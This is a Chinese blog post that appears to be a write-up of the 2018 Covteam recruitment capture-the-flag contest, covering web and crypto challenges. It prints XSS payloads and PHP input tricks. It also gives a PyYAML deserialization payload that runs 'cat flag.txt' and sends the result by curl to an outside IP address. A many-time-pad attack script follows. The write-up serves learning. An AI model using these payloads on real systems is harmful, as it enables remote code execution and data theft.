<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Sma11_Tim3">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Sma11_Tim3">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="Not a product, no need to explain">
    <meta name="description" content="紧张刺激的招新赛终于结束了，快来学一波姿势吧。">
<meta name="keywords" content="Covteam">
<meta property="og:type" content="article">
<meta property="og:title" content="2018Covteam招新赛">
<meta property="og:url" content="http://yoursite.com/2018/10/28/2018Covteam招新赛/index.html">
<meta property="og:site_name" content="Know it &amp; Make it">
<meta property="og:description" content="紧张刺激的招新赛终于结束了，快来学一波姿势吧。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/957947e0fda95584ca3d55110d85a842b3c449ab/chrome99.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/chrome992.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/chrome993.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/chrome994.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/f121.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/bian1.png">
<meta property="og:image" content="c:/Users/pro4/AppData/Roaming/Typora/typora-user-images/1540464136457.png">
<meta property="og:image" content="https://github.com/0devil/tupian/raw/master/bian30.png">
<meta property="og:image" content="https://i.imgur.com/QCuwSgm.png">
<meta property="og:image" content="https://i.imgur.com/GOifrdG.png">
<meta property="og:image" content="https://i.imgur.com/8MhSQcz.png">
<meta property="og:image" content="https://i.imgur.com/icSTZZ1.png">
<meta property="og:image" content="https://i.imgur.com/dHEwPgn.png">
<meta property="og:image" content="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026172458.png">
<meta property="og:image" content="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026172257.png">
<meta property="og:image" content="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026175615.png">
<meta property="og:image" content="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026181346.png">
<meta property="og:image" content="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181027012516.png">
<meta property="og:image" content="https://i.imgur.com/czWI5Ud.png">
<meta property="og:image" content="https://i.imgur.com/WbRbaks.png">
<meta property="og:image" content="https://i.imgur.com/LbtobF1.png">
<meta property="og:image" content="https://i.imgur.com/JNCub5r.png">
<meta property="og:image" content="https://i.imgur.com/Re3LfxR.png">
<meta property="og:image" content="https://i.imgur.com/Ytf7F77.png">
<meta property="og:image" content="https://i.imgur.com/Zw1Smsb.png">
<meta property="og:image" content="https://i.imgur.com/KnoQsQg.png">
<meta property="og:image" content="https://i.imgur.com/brodVh7.png">
<meta property="og:image" content="https://i.imgur.com/PVZ7bXt.png">
<meta property="og:image" content="https://i.imgur.com/2QyLSQG.png">
<meta property="og:image" content="https://i.imgur.com/ViL7dBl.png">
<meta property="og:image" content="https://i.imgur.com/sDaRJID.png">
<meta property="og:image" content="https://i.imgur.com/UASH6RS.png">
<meta property="og:image" content="https://i.imgur.com/OexkgHQ.png">
<meta property="og:image" content="https://i.imgur.com/iVUrwNH.png">
<meta property="og:image" content="https://i.imgur.com/b7Feza0.png">
<meta property="og:image" content="https://i.imgur.com/ILffjwB.png">
<meta property="og:image" content="https://i.imgur.com/uRcH1bR.png">
<meta property="og:image" content="https://i.imgur.com/KWeqpac.png">
<meta property="og:image" content="https://i.imgur.com/IjJWdZL.png">
<meta property="og:image" content="https://i.imgur.com/Tx4uren.png">
<meta property="og:image" content="https://i.imgur.com/H5wxoVk.png">
<meta property="og:image" content="https://i.imgur.com/l7uDJnE.png">
<meta property="og:image" content="https://i.imgur.com/0LozMQo.png">
<meta property="og:image" content="https://i.imgur.com/nPgUyZd.png">
<meta property="og:image" content="https://i.imgur.com/vpCJSNF.png">
<meta property="og:updated_time" content="2018-10-28T07:09:10.845Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018Covteam招新赛">
<meta name="twitter:description" content="紧张刺激的招新赛终于结束了，快来学一波姿势吧。">
<meta name="twitter:image" content="https://github.com/0devil/tupian/raw/957947e0fda95584ca3d55110d85a842b3c449ab/chrome99.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>2018Covteam招新赛 · Sma11_Tim3&#39;s Studio</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/img_0006.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin="">
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin="">
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Sma11_Tim3&#39;s Studio.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">2018Covteam招新赛</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Sma11_Tim3's Studio.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            2018Covteam招新赛
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="Covteam">Covteam</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2.8k</span>阅读时长: <span class="post-count reading-time">12 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/10/28</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>紧张刺激的招新赛终于结束了，快来学一波姿势吧。<br><a id="more"></a></p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h5 id="Easy-XSS"><a href="#Easy-XSS" class="headerlink" title="Easy XSS"></a>Easy XSS</h5><p><code>payload:?name=dazhutizi&quot;&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</code><br><code>得到：flag{- .... . ..-. .. .-. ... - -..- ... ... ..-. .-.. .- --. }</code><br><code>摩斯解密：flag{THEFIRSTXSSFLAG}</code></p>
<h5 id="Maybe-Difficult-XSS"><a href="#Maybe-Difficult-XSS" class="headerlink" title="Maybe Difficult XSS"></a>Maybe Difficult XSS</h5><p><code>payload:?keyword=dazhutizi&quot;&gt;&lt;A HREF=&quot;javascript:alert()&quot;&gt;flag&lt;/a&gt;</code></p>
<p><code>flag{W0w_iS_D1fficu1t_XSS&#39;s_F1ag}</code></p>
<h5 id="Easy-php"><a href="#Easy-php" class="headerlink" title="Easy php"></a>Easy php</h5><p>此题要是输入一个符合要求的数字，那么在sleep()的时候需要等上2个月了。is_numeric函数能够处理正常的数字以及十六进制或0x开头的字符串。而(int)处理十六或0x开头的字符串时会返回0。</p>
<p><code>payload1:?TIME=6e6</code></p>
<p><code>payload2:?TIME=0x4f1a00</code></p>
<h5 id="未来chrome"><a href="#未来chrome" class="headerlink" title="未来chrome"></a>未来chrome</h5><p><strong>看到网页</strong></p>
<p><img src="https://github.com/0devil/tupian/raw/957947e0fda95584ca3d55110d85a842b3c449ab/chrome99.png" alt="Aaron Swartz"></p>
<p><strong>很显然应该修改User-Agent</strong></p>
<p>  <img src="https://github.com/0devil/tupian/raw/master/chrome992.png" alt="Aaron Swartz"></p>
<p><strong>得到一串base64编码的字符</strong></p>
<p><img src="https://github.com/0devil/tupian/raw/master/chrome993.png" alt="3"></p>
<p><strong>解码得flag{uauaua_hahaha}</strong></p>
<p><img src="https://github.com/0devil/tupian/raw/master/chrome994.png" alt="2"></p>
<h5 id="F12"><a href="#F12" class="headerlink" title="F12"></a>F12</h5><p><strong>打开网页看到提示直接F12寻找头部</strong></p>
<p><strong>flag{hahahaha_headers}</strong></p>
<p><img src="https://github.com/0devil/tupian/raw/master/f121.png" alt="3"></p>
<h5 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h5><p><strong>F12寻找提示</strong></p>
<p><img src="https://github.com/0devil/tupian/raw/master/bian1.png" alt="5"></p>
<p><strong>打开文件121212.txt</strong></p>
<p><img src="C:\Users\pro4\AppData\Roaming\Typora\typora-user-images\1540464136457.png" alt="7"></p>
<p><strong>进行审计</strong></p>
<p>URL 通过 get 的方式传参，传输的数据以数组的形式被封装在$_GET 中；extract()函数从数组中将变量导入到当前的符号表，该函数使用数组键名作为变量名，使用数组键值作为变量值；isset()函数判断是否存在变量<code>$shiyan</code>;trim()函数移除字符串两侧的空白字符或其他预定义字符 ，这里是移除字符串两侧的空格；file_get_contents()函数将整个文件读入一个字符串；假如<code>$shiyan</code>的值等于文件的内容(<code>$content</code>)时，就打印出flag</p>
<p>解题方法</p>
<p>shiyan=&amp;flag=</p>
<p>得到flag</p>
<p><img src="https://github.com/0devil/tupian/raw/master/bian30.png" alt="0"></p>
<h5 id="简单验证"><a href="#简单验证" class="headerlink" title="简单验证"></a>简单验证</h5><p><img src="https://i.imgur.com/QCuwSgm.png" alt=""></p>
<p>F12控制台查看js，看到alert的链接，打开得到flag图片</p>
<p><img src="https://i.imgur.com/GOifrdG.png" alt=""></p>
<p>猪圈密码，解码得flag为flag{free_mason}</p>
<h5 id="Who-si-he"><a href="#Who-si-he" class="headerlink" title="Who si he"></a>Who si he</h5><p>F12控制台，看到疑似base64的注释</p>
<p><img src="https://i.imgur.com/8MhSQcz.png" alt=""></p>
<p>Base64转图片解码，根据题目who is he？得flag为flag{zeyehongzhi}</p>
<p><img src="https://i.imgur.com/icSTZZ1.png" alt=""></p>
<h5 id="夏风的日记"><a href="#夏风的日记" class="headerlink" title="夏风的日记"></a>夏风的日记</h5><p><img src="https://i.imgur.com/dHEwPgn.png" alt=""></p>
<p>得到密码为ADAIR321321.<br>登陆后得到flag为flag{bugku-shegong_xmq}</p>
<h5 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h5><p><img src="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026172458.png" alt=""></p>
<p>题目网址内容：</p>
<p><img src="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026172257.png" alt=""></p>
<h5 id="一-背景知识"><a href="#一-背景知识" class="headerlink" title="一 背景知识"></a>一 背景知识</h5><p>​    在勾陈安全实验室的网站<a href="(http://www.polaris-lab.com/index.php/archives/178" title="Python Pickle的任意代码执行漏洞实践和Payload构造)">1</a>上看到一篇文章，文章中讲的Pickle反序列化，而题目中用的是pyyaml模块的反序列化。那么什么是序列化，什么是反序列化呢？</p>
<h6 id="1-1-yaml"><a href="#1-1-yaml" class="headerlink" title="1.1 yaml"></a>1.1 yaml</h6><p>​    yaml和xml、json一样，都是标记类语言，每个支持yaml格式的语言都会有自己的实现来进行yaml格式的解析，其中python里的是pyyaml模块，即是一个yaml库。每个语言的yaml解析器或多或少都会针对这个语言实现一套特殊的对象化规则。</p>
<h6 id="1-2-序列化"><a href="#1-2-序列化" class="headerlink" title="1.2 序列化"></a>1.2 序列化</h6><p>​    序列化是指将数据结构或对象转换成二进制（字节序列）的过程</p>
<p>​    在wp.yaml中写入以下代码：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">date:</span><span class="type">!!str</span> <span class="number">2018</span><span class="bullet">-10</span><span class="bullet">-26</span></span><br><span class="line"><span class="attr">weekday:</span><span class="string">Friday</span></span><br><span class="line"><span class="attr">date1:</span><span class="number">2018</span><span class="bullet">-10</span><span class="bullet">-26</span></span><br></pre></td></tr></table></figure>
<p>​    然后在同一目录下运行如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> yaml</span><br><span class="line"></span><br><span class="line">a = yaml.load(file(<span class="string">"wp.yaml"</span>,<span class="string">"r"</span>)</span><br><span class="line">print(a)</span><br></pre></td></tr></table></figure>
<p>​    运行后，结果如下：</p>
<p><img src="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026175615.png" alt=""></p>
<p>​    可见，yaml中的语句被序列化</p>
<h6 id="1-3-反序列化"><a href="#1-3-反序列化" class="headerlink" title="1.3 反序列化"></a>1.3 反序列化</h6><p>​    反序列化顾名思义是序列化的逆过程，将在序列化过程中生成的二进制串转换成数据结构或者对象的过程</p>
<h5 id="二-出题思路"><a href="#二-出题思路" class="headerlink" title="二 出题思路"></a>二 出题思路</h5><p>​    从文章<a href="http://www.polaris-lab.com/index.php/archives/375/" title="Python PyYAML反序列化漏洞实验和Payload构造" target="_blank" rel="noopener">2</a>得到信息：</p>
<blockquote>
<p>要实现代码执行，需要序列化和反序列化的内容中出现该编程语言中（Python）的对象（函数、类），因为的对象的反序列化，是在构建一个对象的实例（实例化的过程）。如果一个对象中有函数的定义，有可执行代码，那么实例化后再通过方法调用或者其他的途径才能使其中的代码到执行。普通数据类型的反序列化只是变量相关的初始化、赋值等操作，不会涉及到逻辑处理的代码块，所有不会有代码的执行！（普通数据类型 = 数据，对象= 函数代码+数据）。 </p>
</blockquote>
<p>​    并且其主要导致漏洞的函数是yaml.load()。所以从<a href="https://www.anquanke.com/post/id/86800" title="记CTF比赛中发现的Python反序列化漏洞" target="_blank" rel="noopener">3</a>的wp中得到思路，构造一个上传功能，当用户上传以yaml为后缀或者yml为后缀的文件时，代码中的yaml.load()函数对其进行反序列操作。</p>
<p>​    本题主要使用python2.7+flask1.0.2+PyYaml3.12搭建环境。</p>
<p>​    核心代码如下：</p>
<p><img src="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181026181346.png" alt=""></p>
<h5 id="三-解题过程"><a href="#三-解题过程" class="headerlink" title="三 解题过程"></a>三 解题过程</h5><p>​    不断的尝试多种文件，发现有些是合法文件，比如jpg、png、txt等。但在知道这道题是yaml反序列化之后，直接上传一个yaml文件，其中的payload是</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">"hello":</span> <span class="type">!!python</span><span class="string">/object/apply:os.system</span> <span class="string">["curl</span> <span class="attr">http://47.106.105.37/?`cat</span> <span class="string">flag.txt`"]</span></span><br></pre></td></tr></table></figure>
<p>​    在反序列化的过程中执行命令，cat的内容无法直接回显到页面，通过curl，使flag回显到服务器中，其中所给出的ip地址可变，甚至可以回显到本地。在access_log日志信息中可看到flag。</p>
<p><img src="https://machine123.oss-cn-shenzhen.aliyuncs.com/img/20181027012516.png" alt=""></p>
<h5 id="四-复现文件"><a href="#四-复现文件" class="headerlink" title="四 复现文件"></a>四 复现文件</h5><p>​    文件已放在招新群中~~</p>
<p>使用以下命令运行docker</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">docker build -t ctf_web . #创建镜像，ctf_web是任意取的名字</span><br><span class="line"></span><br><span class="line">docker ps #查看镜像</span><br><span class="line"></span><br><span class="line">docker  run -d ctf_web  </span><br><span class="line"></span><br><span class="line">docker run -d -p 22222:5000 ctf_web #将flask默认的5000端口映射到22222端口</span><br></pre></td></tr></table></figure>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h5 id="onetime-pad"><a href="#onetime-pad" class="headerlink" title="onetime pad :"></a>onetime pad :</h5><p>Attacking A Many Time Pad - Cryptography</p>
<p><a href="https://github.com/Jwomers/many-time-pad-attack" target="_blank" rel="noopener">https://github.com/Jwomers/many-time-pad-attack</a></p>
<pre><code>import string
import collections
import sets, sys
c1=&#39;220900155b09223d3a270a5813260d1a07111a0e3257137a5d&#39;
c2=&#39;08080415083b3f3b3b69030d131f0c00005005027f535d575d&#39;
c3=&#39;15090547342135742b20031113020417545400042d4b434714&#39;
c4=&#39;084c1204132a3d31736927545b17040110111a0f3e46135a09&#39;
c5=&#39;0f1f4113132a703b31251754561c06010d411a0e305c135e18&#39;
c6=&#39;0e0305470f2731207f201d545e13111b115c0f133651525f11&#39;
c7=&#39;461c13080d2a3e742b264e1656520b1c00110d153e51585619&#39;
c8=&#39;031a04155b2636742b210b5458171c531d424e0c3a4247130e&#39;
c9=&#39;05191302576f1c312b69231113190b1c031107017f4b5c465d&#39;
c10=&#39;011e04025b3839203769031113060a5301420b472b5a5a405d&#39;
# c11=&#39;080f131e0b3b393b31691d175b170816545002103e4b401d0c&#39;
ciphers = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10]
# The target ciphertext we want to crack
#target_cipher = &quot;0529242a631234122d2b36697f13272c207f2021283a6b0c7908&quot;
# XORs two string
def strxor(a, b):   # xor two strings (trims the longer input)
  return &quot;&quot;.join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b)])
def target_fix(target_cipher):
  # To store the final key
  final_key = [None]*150
  # To store the positions we know are broken
  known_key_positions = set()
  # For each ciphertext
  for current_index, ciphertext in enumerate(ciphers):
    counter = collections.Counter()
    # for each other ciphertext
    for index, ciphertext2 in enumerate(ciphers):
      if current_index != index: # don&#39;t xor a ciphertext with itself
        for indexOfChar, char in enumerate(strxor(ciphertext.decode(&#39;hex&#39;),
ciphertext2.decode(&#39;hex&#39;))): # Xor the two ciphertexts
          # If a character in the xored result is a alphanumeric character,
it means there was probably a space character in one of the plaintexts (we don&#39;t know
which one)
          if char in string.printable and char.isalpha():
counter[indexOfChar] += 1 # Increment the counter at this index
    knownSpaceIndexes = []
    # Loop through all positions where a space character was possible in the
current_index cipher
    for ind, val in counter.items():
      # If a space was found at least 7 times at this index out of the 9 possible
XORS, then the space character was likely from the current_index cipher!
      if val &gt;= 7: knownSpaceIndexes.append(ind)
    #print knownSpaceIndexes # Shows all the positions where we now know the key!
    # Now Xor the current_index with spaces, and at the knownSpaceIndexes positions
we get the key back!
    xor_with_spaces = strxor(ciphertext.decode(&#39;hex&#39;),&#39; &#39;*150)
    for index in knownSpaceIndexes:
      # Store the key&#39;s value at the correct position
      final_key[index] = xor_with_spaces[index].encode(&#39;hex&#39;)
      # Record that we known the key at this position
      known_key_positions.add(index)
  # Construct a hex key from the currently known key, adding in &#39;00&#39; hex chars where
we do not know (to make a complete hex string)
  final_key_hex = &#39;&#39;.join([val if val is not None else &#39;00&#39; for val in final_key])
  # Xor the currently known key with the target cipher
  output = strxor(target_cipher.decode(&#39;hex&#39;),final_key_hex.decode(&#39;hex&#39;))
  print &quot;Fix this sentence:&quot;
  print &#39;&#39;.join([char if index in known_key_positions else &#39;*&#39; for index, char in
enumerate(output)])+&quot;\n&quot;
  # WAIT.. MANUAL STEP HERE
  # This output are printing a * if that character is not known yet
  # fix the missing characters like this: &quot;Let*M**k*ow if *o{*a&quot; = &quot;cure, Let Me know
if you a&quot;
  # if is too hard, change the target_cipher to another one and try again
  # and we have our key to fix the entire text!
  #sys.exit(0) #comment and continue if u got a good key
  target_plaintext = &quot;cure, Let Me know if you a&quot;
  print &quot;Fixed:&quot;
  print target_plaintext+&quot;\n&quot;
  key = strxor(target_cipher.decode(&#39;hex&#39;),target_plaintext)
  print &quot;Decrypted msg:&quot;
  for cipher in ciphers:
    print strxor(cipher.decode(&#39;hex&#39;),key)
  print &quot;\nPrivate key recovered: &quot;+key+&quot;\n&quot;

for i in ciphers:
  target_fix(i)
</code></pre><h4 id="Base全家桶"><a href="#Base全家桶" class="headerlink" title="Base全家桶"></a>Base全家桶</h4><p>直接上脚本<br>​    import base64<br>​    s1=”4C4A575851324332474E324547574B594A563546514D4B4747464D564F4E4C474B4E56454D32435947464A484D56444E4D5134513D3D3D3D”<br>​    s1=base64.b16decode(s1)<br>​    s1=base64.b32decode(s1)<br>​    s1=base64.b64decode(s1)<br>​    print s1</p>
<p><img src="https://i.imgur.com/czWI5Ud.png" alt=""></p>
<h4 id="多次Base64"><a href="#多次Base64" class="headerlink" title="多次Base64"></a>多次Base64</h4><pre><code>import base64
a = open(&#39;base64.txt&#39;)
try:
    b = a.read( )
finally:
    a.close( )
while True:
try:
    b=base64.b64decode(b)
except:
    print b;
    break;
</code></pre><p>flag{base64_base64_base64}</p>
<h4 id="随机Base64"><a href="#随机Base64" class="headerlink" title="随机Base64"></a>随机Base64</h4><pre><code>import base64
f = open(&quot;code.txt&quot;)
file = f.read()
n = &#39;&#39;
steps= []
while True:    
    try:
        n = base64.b16decode(file)
        steps.append(16)
        file = n
        continue
    except:
        pass
    try:
        n = base64.b32decode(file)
        steps.append(32)
        file = n
        continue
    except:
        pass
    try:
        n = base64.b64decode(file)
        steps.append(64)
        file = n
        continue
    except:
        pass
    break

print steps
print n
</code></pre><p>此类脚本可收藏哦</p>
<p><img src="https://i.imgur.com/WbRbaks.png" alt=""></p>
<h4 id="Easy-RSA"><a href="#Easy-RSA" class="headerlink" title="Easy RSA"></a>Easy RSA</h4><p>简单的共模攻击，用python脚本提取n和e。</p>
